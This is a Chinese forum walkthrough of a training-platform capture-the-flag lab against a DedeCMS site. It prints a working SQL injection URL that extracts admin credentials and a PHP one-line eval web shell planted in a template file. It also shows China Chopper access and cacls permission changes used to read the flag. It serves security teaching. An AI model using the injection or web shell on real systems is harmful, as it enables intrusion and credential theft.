本帖最后由 独狼1927 于 2017-2-22 15:40 编辑
image001.png (194.44 KB, 下载次数: 135)
2017-2-20 18:00 上传
Step 0
实验环境
操作机:Windows XP [172.16.11.2]
目标网址:www.test.ichunqiu [172.16.12.2]
实验工具:中国菜刀
实验目标:获取www.test.ichunqiu网站的FLAG信息,学习一些简单的提权方式。
小i提示
在本次实验中,请注意实验工具、实验文件存放路径,不同的文件路径可能会出现不一样的实验结果。
在实验环境中无法连接互联网,请使用您本地的网络环境。
Step 1
dedeCMS
进入实验环境后,注意左侧的实验指导说明,部分实验提供实验文件下载(当前环境中CMS的源码或者漏洞利用工具),对达到实验目的有很大帮助。
打开浏览器,输入提供的网址,下载dedeCMS漏洞利用工具;
image002.png (31.94 KB, 下载次数: 137)
2017-2-20 18:00 上传
打开漏洞利用工具,输入URL:
[Bash shell] 纯文本查看 复制代码www.test.ichunqiu
点击一键爆账号密码;
image003.png (23.02 KB, 下载次数: 133)
2017-2-20 18:00 上传
用户名:ichunqiu,md5:adab29e084ff095ce3eb,20位md5肯定不是正确的,但可以肯定的是这个值是从32位md5中截取的;尝试从20位中取16位正确md5:b29e084ff095ce3e = md5(only_system,16);
image004.png (20.61 KB, 下载次数: 149)
2017-2-20 18:00 上传
附加说明:该工具漏洞利用如下
[Bash shell] 纯文本查看 复制代码http://www.test.ichunqiu/plus/recommend.php?action=&aid=1&
_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&
_FILES[type][name]=1.jpg&
_FILES[type][type]=application/octet-stream&
_FILES[type][size]=6878
Step 2
有了用户名和密码,但是不知道后台地址,如何找后台路径?
dedeCMS漏洞:mysqli_error_trace.inc 文件里会残留后台路径。
dedeCMS目录中的data/mysqli_error_trace.inc文件,是记录数据库出错信息。一般是用于网站存在错误,系统自动记录在该文件中,进一步说,就是该文件是记录sql错误信息的文件,类似于日志功能,关键是它会记录后台路径。
image005.png (26.5 KB, 下载次数: 138)
2017-2-20 18:00 上传
在浏览器地址栏中输入URL:
[Bash shell] 纯文本查看 复制代码www.test.ichunqiu/lichunqiul
即可打开后台管理系统登录页面;输入之前获得的用户名和密码[ichunqiu / only_system]可成功登录后台管理系统;
image006.png (44.53 KB, 下载次数: 153)
2017-2-20 18:00 上传
下一步的工作就是挂马;点击左侧菜单栏中的 [模板]-->[标签源码管理],右侧页面中会出现许多标签文件,挑一个文件点击后面的[编辑];
注意:1. 记住标签文件的路径/include/taglib 2. 记住你点击编辑的文件名,我在实验中用的是第一个文件adminname.lib.php
image007.png (41.32 KB, 下载次数: 115)
2017-2-20 18:00 上传
在文件内容中写入一句话木马
[Bash shell] 纯文本查看 复制代码<?php @eval($_POST['ichunqiu']); ?>
image008.png (39.43 KB, 下载次数: 114)
2017-2-20 18:00 上传
拉到页面最下边,点击[保存]按钮;
image009.png (38.08 KB, 下载次数: 138)
2017-2-20 18:00 上传
出现该页面说明保存成功,继续下一步,上菜刀;
image010.png (27.22 KB, 下载次数: 133)
2017-2-20 18:00 上传
Step 3
打开[中国菜刀] 连接一句话木马;
工具:中国菜刀
路径:C:\Tools\webshell\中国菜刀\chopper.exe
image011.png (34.52 KB, 下载次数: 136)
2017-2-20 18:00 上传
打开菜刀,右键空白处,选择[添加];
image012.png (16.76 KB, 下载次数: 147)
2017-2-20 18:00 上传
在地址栏中输入正确的一句话木马所在文件路径:
[Bash shell] 纯文本查看 复制代码http://www.test.ichunqiu/include/taglib/adminname.lib.php
后面的小框里填入ichunqiu,就是一句话$_POST里的值,这两处保持一致即可,点击 [添加];
image013.png (16.89 KB, 下载次数: 132)
2017-2-20 18:00 上传
添加完成后,在新增的记录上点击右键,选择 [虚拟终端];
image014.png (20.58 KB, 下载次数: 124)
2017-2-20 18:00 上传
打开虚拟终端后,显示如下画面,在命令行中输入whoami,结果很感人,SYSTEM权限!
image015.png (17.75 KB, 下载次数: 133)
2017-2-20 18:00 上传
旗标文件在桌面文件夹中,cd到桌面目录,用type命令查看flag文本文件,结果很不感人,拒绝访问!
image016.png (20.01 KB, 下载次数: 136)
2017-2-20 18:00 上传
用cacls命令查看访问控制列表,SYSTEM:N,巨大的一枚坑;
image017.png (18.49 KB, 下载次数: 157)
2017-2-20 18:00 上传
修改SYSTEM访问控制权限:
[Bash shell] 纯文本查看 复制代码cacls flag~ichunqiu.txt /E /P system:F /C
参数说明:
/E:编辑访问控制列表而不替换;
/P user:perm替换指定用户的访问权限(F是完全控制的意思);
/C:在出现拒绝访问错误时继续。
处理成功后,再一次查看文件访问控制权限,SYSTEM已经修改为F:完全控制,用type命令查看flag文件即可得到答案。
image018.png (21.34 KB, 下载次数: 140)
2017-2-20 18:00 上传
--END--
ps:部分知识点的内容转自网络;路漫漫其修远兮,感谢小盆友们的帮助@i春秋-花花 @i春秋-小柒
Dareand the world always yields.